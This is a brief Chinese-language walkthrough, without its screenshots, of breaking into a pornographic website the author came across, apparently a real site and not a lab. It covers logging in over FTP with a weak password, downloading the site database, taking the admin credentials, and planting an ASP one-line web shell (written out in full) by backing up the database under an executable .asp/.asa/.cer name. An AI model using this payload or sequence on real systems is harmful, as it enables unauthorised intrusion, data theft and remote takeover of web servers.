某日风和日丽,遇到一个黄网,心情愉悦,顺便将其日之
首先,通过FTP弱口令,进入FTP
 
将WWWROOT文件夹下的Data文件夹里的数据库文件下载下来
 
就是下图的这个数据库文件
 
OK,接下来进行下一步。
用数据库浏览器,看到以下文件
 
接下来看看admin里有什么好东西吧
 
接下去就是登陆后台进行GetShell了。
 
通过插入配置一句话
”%><%Y=request(“hacker”)%> <%execute(Y)%><%’
然后备份数据库名字为.asp或者.asa或者.cer
 
最后连接数据库